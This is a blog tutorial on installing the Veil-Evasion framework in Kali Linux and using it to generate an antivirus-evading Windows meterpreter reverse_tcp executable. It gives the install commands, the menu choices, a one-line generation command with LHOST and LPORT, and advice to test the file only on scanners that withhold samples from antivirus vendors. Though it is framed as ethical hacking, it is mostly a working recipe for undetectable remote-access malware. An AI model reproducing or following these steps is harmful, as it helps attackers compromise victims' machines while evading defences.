msfvenom | LINUX DIGEST

Tag Archive: msfvenom

Evading Antivirus using Veil-Framework in Kali Linux

Filed under: ETHICAL HACKING, KALI LINUX, LINUX, PEN-TESTING — 11 Comments

June 7, 2014

Veil is a Python program that attempts to automate the creation of AV-evading payloads in a new framework.

Veil-Evasion is a tool to generate payload executables that bypass common antivirus solutions by creating each payload with randomness. Veil-Evasion’s code is located at https://www.github.com/Veil-Framework/Veil-Evasion/ and it’s a part of the Veil super project at https://github.com/Veil-Framework/Veil which we recommend mosts users clone and install.

We can also use the payloads from Metasploit framework and its compatible for both x86 and x64 arch and update Veil either the command line or menu.

If you want to install Veil in your own environment you can use the commands below:

#wget -c https://codeload.github.com/Veil-Framework/Veil-Evasion/zip/master

#unzip -q master.zip

#cd Veil-Evasion-master/setup

#./setup.sh

After Veil is installed, just run it with the command below:

#./Veil-Evasion.py

Then change to the “Veil-Master” directory and launch the ./Veil-Evasion.py python script. The Veil window will appear. You see that today it has 31 payloads:

You can obtain a list of all the payloads with the “list” command:

[>] Please enter a command: list

[>] Please enter a command: use 27

[>] Please enter a command: set use_pyherion Y

The payloads include PyInjector-style payload injection with or without encryption and PowerShell injection of payloads.PyInjector creates a Python executable with an embedded ASCII payload in it, but it uses standard Windows API calls to put the payload in memory and execute it.

Both of these methods are very effective for AV evasion. I am going to use the python/b64_substitution payload. This method will use the PyInjector style of injection with substitution of the payload. I type”use 27″ and press Enter. It loads that component, as shown below:

[>] Please enter a command: generate

After giving generate command, Then it’s necessary to wait while the shellcode is been generated.

Now we are going to select msfvenom typing “1”

[>] Please enter the number of your choice : 1

After that we need to type some details:

Enter metasploit payload: “windows/meterpreter/reverse_tcp”

Enter value for ‘LHOST’, [tab] for local IP: “192.168.31.20”

Enter value for ‘LPORT’: “443”

You need to press enter and then Veil requests us the name of our payload. In this case “undetectable”

We are going to use Pyinstaller. It will create a .exe installable. For this, we are going to type “1”

[>] Please enter the number of your choice : 1

Next, I issue the “generate” command and press enter to create the executable.

The Python programmers reading this will certainly appreciate the source code that is produced. Look at this beautiful hot mess of a program! All the variable names are randomized. The payloads are encrypted and encoded.

But,it gets even better to accessible directly from the command line, so you don’t have to use the console to generate these payloads.

I can generate the same payload by running the following single command:

#./Veil-Evasion.py -l python -p python/b64_substitution -o trytofindthis –msfpayload windows/meterpreter/reverse_tcp –msfoptions LHOST=192.168.31.20 LPORT=443

With this command-line-style interface, you can bypass the menu system of Veil, and scripts.

In the end, we can get our executable at “/root/Veil-master/output/compiled/”

The veil’s developers don’t want to submit any payload to http://www.virustotal.com to avoid distribution to the anti-virus vendors. There are an alternativeuse vscan.novirusthanks.org. That site scan the suspicious files for malware detection and offer us the option below: “Do not distribute the sample”.

Now, we have our executable and we are going to submit it to vscan.novirusthanks.org. Please, remember to check “Do not distribute the sample”. If you choose to don’t check this options or you decide to submit the executable to http://www.virustotal.com your file will be investigated and maybe it will be recognized by some anti-virus vendors.